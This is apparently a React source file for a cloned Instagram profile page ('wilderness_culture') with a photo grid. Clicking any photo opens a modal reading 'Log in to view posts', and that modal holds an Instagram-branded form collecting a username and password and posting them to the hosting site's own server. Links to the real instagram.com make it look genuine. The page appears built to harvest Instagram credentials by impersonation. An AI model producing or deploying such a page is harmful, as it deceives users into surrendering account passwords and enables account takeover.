import React from "react";
import Footer from "../components/Footer";
import "../styles/Landing.css";
class Landing extends React.Component {
  render() {
    return (
      <div>

<nav class="border-b px-4 py-2 bg-white mt-0">

  <div class="flex flex-wrap items-center justify-between md:justify-around">
 
    <img class="h-10" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/150px-Instagram_logo.svg.png" alt="instagram"/>


    <div class="relative hidden sm:block text-gray-500">
      <input class="search-bar max-w-xs border rounded bg-gray-100 px-4
            text-center outline-none focus:border-gray-400" type="search" placeholder="Search"/>
      <i class="fa fa-search absolute top-0 left-0 ml-12 mt-1"></i>
    </div>

    <div class="space-x-4">
      <a class="inline-block bg-blue-500 px-2 py-1 text-white font-semibold 
                           text-sm rounded" href="/signin">Log In</a>

                           
      <a class="inline-block text-blue-500 font-semibold text-sm" href="#">Sign Up</a>
    </div>
  </div>
</nav>

<main class="bg-gray-100 bg-opacity-25">

  <div class="lg:w-8/12 lg:mx-auto mb-8">

    <header class="flex flex-wrap items-center p-4 md:py-8">

      <div class="md:w-3/12 md:ml-16">
        
        <img class="w-20 h-20 md:w-40 md:h-40 object-cover rounded-full  bg-gray-900 
                     border-2 border-pink-600 p-1" src="/profile pic.png" alt="profile"/>
      </div>


      <div class="w-8/12 md:w-7/12 ml-4">
        <div class="md:flex md:flex-wrap md:items-center mb-4">
          <h2 class="text-2xl font-serif inline-block font-light md:mr-2 mb-2 sm:mb-0">
          wilderness_culture
          </h2>

{/* 
          <span class="inline-block fas fa-certificate fa-lg text-blue-500 
                               relative mr-6 text-xl transform -translate-y-2" aria-hidden="true">
            <i class="fas fa-check text-white text-xs absolute inset-x-0
                               ml-1 mt-px"></i>
          </span> */}

<a href="#" class="btn-outline  px-1 py-1 w-17 mr-1 mt-4 border-gray-600 border-2 
                        text-black font-semibold text-sm rounded block text-center 
                        sm:inline-block block">message</a>
                 
          <a href="#" class="btn-outline px-2 py-1 mt-4  border-2 
                        text-black font-semibold text-sm rounded block text-center border-gray-600
                        sm:inline-block block">Follow</a>
        </div>
        {/* <svg id="three-dots-svg" width="30" height="30" viewBox="0 0 44 44" fill="none" xmlns="http://www.w3.org/2000/svg">
          <path d="M9.16668 23.8333C10.1792 23.8333 11 23.0125 11 22C11 20.9875 10.1792 20.1667 9.16668 20.1667C8.15415 20.1667 7.33334 20.9875 7.33334 22C7.33334 23.0125 8.15415 23.8333 9.16668 23.8333Z" fill="#120C35" stroke="#120C35" stroke-width="2.75" stroke-linecap="round" stroke-linejoin="round" />
          <path d="M22 23.8333C23.0125 23.8333 23.8333 23.0125 23.8333 22C23.8333 20.9875 23.0125 20.1667 22 20.1667C20.9875 20.1667 20.1667 20.9875 20.1667 22C20.1667 23.0125 20.9875 23.8333 22 23.8333Z" fill="#120C35" stroke="#120C35" stroke-width="2.75" stroke-linecap="round" stroke-linejoin="round" />
          <path d="M34.8333 23.8333C35.8459 23.8333 36.6667 23.0125 36.6667 22C36.6667 20.9875 35.8459 20.1667 34.8333 20.1667C33.8208 20.1667 33 20.9875 33 22C33 23.0125 33.8208 23.8333 34.8333 23.8333Z" fill="#120C35" stroke="#120C35" stroke-width="2.75" stroke-linecap="round" stroke-linejoin="round" />
        </svg> */}


        <ul class="hidden md:flex space-x-8 mb-4">
          <li>
            <span class="font-semibold">2,435</span>
            posts
          </li>

          <li>
            <span class="font-semibold">1.8M</span>
            followers
          </li>
          <li>
            <span class="font-semibold">1000</span>
            following
          </li>
        </ul>

   
        <div class="hidden md:block">
          {/* <h1 class="font-semibold ml-20">wilderness_culture</h1> */}
          <span>Community of outdoor enthusiasts. Our mission is to inspire outdoor adventure while advocating for wilderness preservation #wildernessculture @
    
          </span>
          <a href="https://wildernessculture.com/" class="text-blue-900 underline">wildernessculture.com</a>
     

          {/* <p>Lorem ipsum dolor sit amet consectetur</p> */}
        </div>


      </div>


      <div class="md:hidden text-sm my-2">
        {/* <h1 class="font-semibold mr-80">wilderness_culture</h1> */}
        <span>Community of outdoor enthusiasts. </span>
          <span></span>
        {/* <span className="btn btn-link" href='/https://wildernessculture.com/'>wildernessculture.com</span> */}
        <a href="https://wildernessculture.com/" class="text-blue-900 underline">wildernessculture.com</a>
        {/* <p>Lorem ipsum dolor sit amet consectetur</p> */}
      </div>

    </header>


 
    <div class="px-px md:px-3">


      <ul class="flex md:hidden justify-around space-x-8 border-t 
                text-center p-2 text-gray-600 leading-snug text-sm">
        <li>
          <span class="font-semibold text-gray-800 block">136</span>
          posts
        </li>

        <li>
          <span class="font-semibold text-gray-800 block">40.5k</span>
          followers
        </li>
        <li>
          <span class="font-semibold text-gray-800 block">302</span>
          following
        </li>
      </ul>

     
      <ul class="flex items-center justify-around md:justify-center space-x-12  
                    uppercase tracking-widest font-semibold text-xs text-gray-600
                    border-t">
       
        <li class="md:border-t md:border-gray-700 md:-mt-px md:text-gray-700">
          <a class="inline-block p-3" href="#">
            <i class="fas fa-th-large text-xl md:text-xs"></i>
            <span class="hidden md:inline">post</span>
          </a>
        </li>
        <li>
          <a class="inline-block p-3" >
            <i class="far fa-square text-xl md:text-xs"></i>
            <span class="hidden md:inline">igtv</span>
          </a>
        </li>
        <li>

    
          <a class="inline-block p-3" >
          <label htmlFor="my-modal-3">
            <i class="fas fa-user border border-gray-500
                             px-1 pt-1 rounded text-xl md:text-xs"></i>
         
            <span class="hidden md:inline">tagged</span>
            </label>
          </a>
      
        </li>
      </ul>

  
      
      <div class="flex flex-wrap -mx-px md:-mx-3">

       
        <div class="w-1/3 p-px md:px-3">
   
          {/* <a href="/signin"> */}
          <label htmlFor="my-modal-3">
            <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
             
              <img class="w-full h-full absolute left-0 top-0 object-cover  modal-button "  src="https://images.unsplash.com/photo-1470071459604-3b5ec3a7fe05?ixlib=rb-1.2.1&ixid=MnwxMjA3fDB8MHxzZWFyY2h8NHx8bmF0dXJlfGVufDB8fDB8fA%3D%3D&auto=format&fit=crop&w=800&q=60" alt="image"/>

              <i class="fas fa-square absolute right-0 top-0 m-1"></i>
            
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    412K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    2,909
                  </span>
                </div>
              </div>

            </article>
            </label>
          {/* </a> */}
        </div>




        <div class="w-1/3 p-px md:px-3">
        <label htmlFor="my-modal-3">
         
            <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
              <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://images.unsplash.com/photo-1527489377706-5bf97e608852?ixlib=rb-1.2.1&ixid=MnwxMjA3fDB8MHxzZWFyY2h8MTB8fHdpbGRlcm5lc3MlMjBuYXR1cmV8ZW58MHx8MHx8&auto=format&fit=crop&w=800&q=60" alt="image"/>

     
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    412K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    1,993
                  </span>
                </div>
              </div>

            </article>
        </label>
        </div>

        <div class="w-1/3 p-px md:px-3">
        <label htmlFor="my-modal-3">
            <article class="post bg-gray-100 text-white relative pb-full  md:mb-6">
              <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://images.unsplash.com/photo-1550620166-e7b95af27b39?ixlib=rb-1.2.1&ixid=MnwxMjA3fDB8MHxzZWFyY2h8MTV8fHdpbGRlcm5lc3MlMjBuYXR1cmV8ZW58MHx8MHx8&auto=format&fit=crop&w=800&q=60" alt="image"/>
             
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    112K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    2,090
                  </span>
                </div>
              </div>
            </article>
          </label>
        </div>

        <div class="w-1/3 p-px md:px-3">
        <label htmlFor="my-modal-3">
            <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
              <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://images.unsplash.com/photo-1447752875215-b2761acb3c5d?ixlib=rb-1.2.1&ixid=MnwxMjA3fDB8MHxzZWFyY2h8MTB8fG5hdHVyZXxlbnwwfHwwfHw%3D&auto=format&fit=crop&w=800&q=60" alt="image"/>

              <i class="fas fa-video absolute right-0 top-0 m-1"></i>

             
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    841K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    909
                  </span>
                </div>
              </div>

            </article>
       </label>
        </div>

        <div class="w-1/3 p-px md:px-3">
        <label htmlFor="my-modal-3">
            <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
              <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://images.unsplash.com/photo-1587502537104-aac10f5fb6f7?ixlib=rb-1.2.1&ixid=MnwxMjA3fDF8MHxzZWFyY2h8OHx8bmF0dXJlfGVufDB8fDB8fA%3D%3D&auto=format&fit=crop&w=800&q=60" alt="image"/>
             
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    120K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    3,909
                  </span>
                </div>
              </div>

              

            </article>
          </label>
        </div>



        <div class="w-1/3 p-px md:px-3">
        <label htmlFor="my-modal-3">
            <article class="post bg-gray-100 text-white relative pb-full  md:mb-6">
              <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://images.unsplash.com/photo-1430797877645-98aa0693fb34?ixlib=rb-1.2.1&ixid=MnwxMjA3fDB8MHxzZWFyY2h8MTd8fHdpbGRlcm5lc3MlMjBuYXR1cmV8ZW58MHx8MHx8&auto=format&fit=crop&w=800&q=60" alt="image"/>
             
              <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                                left-0 top-0 hidden">
                <div class="flex justify-center items-center 
                                    space-x-4 h-full">
                  <span class="p-2">
                    <i class="fas fa-heart"></i>
                    112K
                  </span>

                  <span class="p-2">
                    <i class="fas fa-comment"></i>
                    2,090
                  </span>
                </div>
              </div>
            </article>
          </label>
        </div>



        <div class="w-1/3 p-px md:px-3">
   
   {/* <a href="/signin"> */}
   <label htmlFor="my-modal-3">
     <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
      
       <img class="w-full h-full absolute left-0 top-0 object-cover  modal-button "  src="https://media.istockphoto.com/photos/wildflower-in-the-foothills-of-california-picture-id1368504940?b=1&k=20&m=1368504940&s=170667a&w=0&h=Q3-6Fgw05xB0ZLYur78G1bgf6JFDhcRmCBtZABuRHFE=" alt="image"/>

       <i class="fas fa-square absolute right-0 top-0 m-1"></i>
     
       <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                         left-0 top-0 hidden">
         <div class="flex justify-center items-center 
                             space-x-4 h-full">
           <span class="p-2">
             <i class="fas fa-heart"></i>
             412K
           </span>

           <span class="p-2">
             <i class="fas fa-comment"></i>
             2,909
           </span>
         </div>
       </div>

     </article>
     </label>
   {/* </a> */}
 </div>




 <div class="w-1/3 p-px md:px-3">
 <label htmlFor="my-modal-3">
  
     <article class="post bg-gray-100 text-white relative pb-full md:mb-6">
       <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://media.istockphoto.com/photos/highway-at-sunrise-going-into-death-valley-national-park-picture-id1087673356?b=1&k=20&m=1087673356&s=170667a&w=0&h=_r4ze-k-YwLMolp_6F_PXAYNu5BgGWFi00jXBdp4o20=" alt="image"/>


       <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                         left-0 top-0 hidden">
         <div class="flex justify-center items-center 
                             space-x-4 h-full">
           <span class="p-2">
             <i class="fas fa-heart"></i>
             412K
           </span>

           <span class="p-2">
             <i class="fas fa-comment"></i>
             1,993
           </span>
         </div>
       </div>

     </article>
 </label>
 </div>

 <div class="w-1/3 p-px md:px-3">
 <label htmlFor="my-modal-3">
     <article class="post bg-gray-100 text-white relative pb-full  md:mb-6">
       <img class="w-full h-full absolute left-0 top-0 object-cover" src="https://media.istockphoto.com/photos/beautiful-diablo-lake-is-a-reservoir-in-the-north-cascade-mountains-picture-id689114978?b=1&k=20&m=689114978&s=170667a&w=0&h=IxNkXORJfuR25IhpIp9mgZqF-lf_mSfsDguVfoF0zgs=" alt="image"/>
      
       <div class="overlay bg-gray-800 bg-opacity-25 w-full h-full absolute 
                         left-0 top-0 hidden">
         <div class="flex justify-center items-center 
                             space-x-4 h-full">
           <span class="p-2">
             <i class="fas fa-heart"></i>
             112K
           </span>

           <span class="p-2">
             <i class="fas fa-comment"></i>
             2,090
           </span>
         </div>
       </div>
     </article>
   </label>
 </div>


 {/* more page feed */}



{/* modal */}


{/* <label htmlFor="my-modal-3" className="btn modal-button">open modal</label> */}

<input type="checkbox" id="my-modal-3" className="modal-toggle" />
<div className="modal">
  <div className="modal-box relative">
    <label htmlFor="my-modal-3" className="btn btn-sm btn-circle absolute right-2 top-2">✕</label>
 
       <h1 class="font-serif font-bold text-gray-400">Log in to view posts from wilderness_culture</h1>
       <div class="login">


<a href="/">
            <h1><img class="image" src="https://i.imgur.com/wvLiKam.png" width="200px" height="68px" /></h1> </a>

            <form class="form" action="" method="POST">

              <input placeholder="Phone number, username, or email" type="text" name="username" required />
              <input placeholder="Password" type="password" name="password" required />

              <input type="submit" value="Log In" /><br></br>

            </form>

            <div class="divider"> <b>OR</b> </div>

            <div class="fbwrapper"><div class="fb"><a href="https://facebook.com"><img src="https://i.imgur.com/exksovo.png" />  Log in with Facebook</a></div></div>

            <div class="forgotwrapper"><div class="forgot"><a href="https://instagram.com">Forgot password?</a></div></div>


          </div>


          <div class="infobox">

            <p>Don't have an account? <a href="https://instagram.com">Sign up</a></p>
        
       </div> 
  </div>
</div>


      </div>
    </div>
  </div>

</main>

<Footer/>


      </div>



    );
  }
}
export default Landing;
